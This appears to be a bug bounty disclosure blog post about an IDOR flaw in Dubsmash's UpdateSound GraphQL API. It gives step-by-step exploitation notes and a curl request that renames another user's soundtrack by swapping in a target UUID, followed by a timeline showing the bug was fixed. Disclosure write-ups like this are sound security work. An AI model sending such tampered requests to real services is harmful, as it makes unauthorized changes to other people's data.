Vulnerability Overview
Dubsmash, a widely-used social media platform, enables users to create short lip-syncing videos using soundtracks from its library or user-uploaded content. During my security research on the iOS application, I discovered a critical Insecure Direct Object Reference (IDOR) vulnerability in the UpdateSound GraphQL API endpoint. This flaw allowed attackers to bypass authorization and manipulate the metadata of any soundtrack, potentially jeopardizing the integrity of the entire music library.
Understanding the Vulnerability
An Insecure Direct Object Reference (IDOR) occurs when an application provides direct access to objects (such as files, database entries, or records) based on user-supplied input without verifying the user’s permission. In Dubsmash, the application failed to validate if the uuid parameter in the UpdateSound API request belonged to the logged-in user.
As a result, an attacker could exploit this weakness to modify any soundtrack's title simply by knowing its UUID—information that was publicly exposed in various API responses.
How the Vulnerability Was Exploited
Here’s a step-by-step breakdown of how I identified and exploited the issue:
- Uploading a Soundtrack: I uploaded a soundtrack to my "My Sounds" section within the Dubsmash iOS app.
- Capturing the Request: I edited the soundtrack title and captured the HTTP request sent to the vulnerable
UpdateSoundGraphQL API endpoint using Burp Suite. - Altering the UUID: I replaced the
uuidparameter in the request with the UUID of another soundtrack (accessible from multiple API responses). - Forwarding the Request: The manipulated request was forwarded to the server. The result? The title of the target soundtrack was successfully changed.
Here’s the vulnerable HTTP request:
curl -X POST \
-H "Authorization: Bearer XXXXXX" \
-H "Content-Type: application/json" \
--data-binary '{
"query": "mutation UpdateSound($input: UpdateSoundInput!) { updateSound(input: $input) { sound { uuid name } } }",
"variables": {
"input": {
"uuid": "TARGET_UUID",
"name": "Modified Title"
}
}
}' https://gateway-production.dubsmash.com/graphql
Impact
This vulnerability had severe implications:
- Unauthorized Edits: Any attacker could alter soundtrack titles simply by knowing their UUIDs, which were publicly available.
- Mass Exploitation: By automating the process, an attacker could modify the entire Dubsmash music library.
Timeline
- Feb 13, 2021: Submitted the vulnerability report to Reddit’s bug bounty program (which oversees Dubsmash security).
- Feb 22, 2021: Reddit’s security team requested additional information.
- Feb 24, 2021: Vulnerability was triaged by the security team.
- Mar 1, 2021: The issue was resolved, and I received a $3,000 bounty for my efforts.
Conclusion
This bug bounty research highlights the dangers of IDOR vulnerabilities in modern applications. Even a minor oversight, such as failing to validate object ownership, can expose systems to significant exploitation. To protect sensitive data and ensure platform integrity, developers must adopt strict access controls and thoroughly test their APIs.
.webp)
Founder & CEO @ Appsecure Security
.png)
.webp)
.webp)
.webp)
.webp)
.webp)
